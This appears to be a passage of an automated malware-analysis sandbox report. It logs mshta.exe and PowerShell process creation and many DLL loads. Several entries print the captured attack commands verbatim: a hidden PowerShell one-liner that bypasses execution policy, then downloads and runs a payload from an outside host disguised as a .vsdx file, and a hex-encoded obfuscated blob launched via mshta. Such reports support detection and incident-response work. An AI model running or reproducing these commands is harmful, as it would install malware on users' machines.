                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
